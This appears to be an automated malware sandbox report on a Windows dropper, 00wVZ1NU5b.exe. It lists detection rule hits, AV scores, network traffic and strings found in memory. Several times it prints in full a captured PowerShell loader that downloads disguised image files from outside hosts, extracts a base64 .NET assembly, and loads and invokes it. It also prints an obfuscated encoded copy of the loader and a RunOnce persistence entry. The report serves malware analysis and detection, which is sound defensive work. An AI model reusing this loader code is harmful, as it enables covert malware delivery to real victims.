F@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J
        Sigma detected: Script Interpreter Execution From Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c lol.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4340, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , ProcessId: 2328, ProcessName: wscript.exe
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c lol.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4340, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , ProcessId: 2328, ProcessName: wscript.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c lol.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4340, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , ProcessId: 2328, ProcessName: wscript.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\00wVZ1NU5b.exe, ProcessId: 6764, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd /c lol.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4340, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" , ProcessId: 2328, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J

        Data Obfuscation

        barindex
        Sigma detected: Powershell download and load assembly
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: 00wVZ1NU5b.exeReversingLabs: Detection: 15%
        Source: 00wVZ1NU5b.exeVirustotal: Detection: 16%Perma Link
        Joe Sandbox ML detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F3214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7E74F3214
        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49709 version: TLS 1.2
        Source: 00wVZ1NU5b.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: 00wVZ1NU5b.exe
        Source: Binary string: wextract.pdbGCTL source: 00wVZ1NU5b.exe
        Source: Binary string: corlib.pdbpdblib.pdbf"fh* source: powershell.exe, 00000007.00000002.2174893895.00000218A908A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: CallSite.Target.pdbp source: powershell.exe, 00000007.00000002.2200132855.00000218C30AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ib.pdbS source: powershell.exe, 00000007.00000002.2202017383.00000218C3434000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F2034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7E74F2034

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global trafficHTTP traffic detected: GET /dfghd/fgd/downloads/test.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /dfghd/fgd/downloads/test.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Feb 2025 15:43:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 15017Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "7f7908308f366abffcf098bdafef16bb"X-Dc-Location: Micros-3X-Served-By: fba66d1138abX-Version: dedd26be6991X-Static-Version: dedd26be6991X-Request-Count: 2166X-Render-Time: 0.047760963439941406X-B3-Traceid: 2b02383bb86b411b8d755437b7c10aadX-B3-Spanid: ccb633098079d451X-Frame-Options: SAMEORIGINContent-Security-Policy: base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpuser.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: h
        Source: powershell.exe, 00000007.00000002.2202729046.00000218C34F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB8EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000007.00000002.2195392778.00000218BACB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000005.00000002.2211178390.000001DB2C6DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AAE68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.atlassian.com
        Source: powershell.exe, 00000005.00000002.2211178390.000001DB2C691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000005.00000002.2211178390.000001DB2C6AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AAC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC9B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218ACB58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000007.00000002.2175735528.00000218ACB7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AC032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218ACB58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.bitbucket.org
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ad
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ap
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/entry/ve
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/css/themes/a
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB03E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/dist/webpack
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/dedd26be6991/img/default_
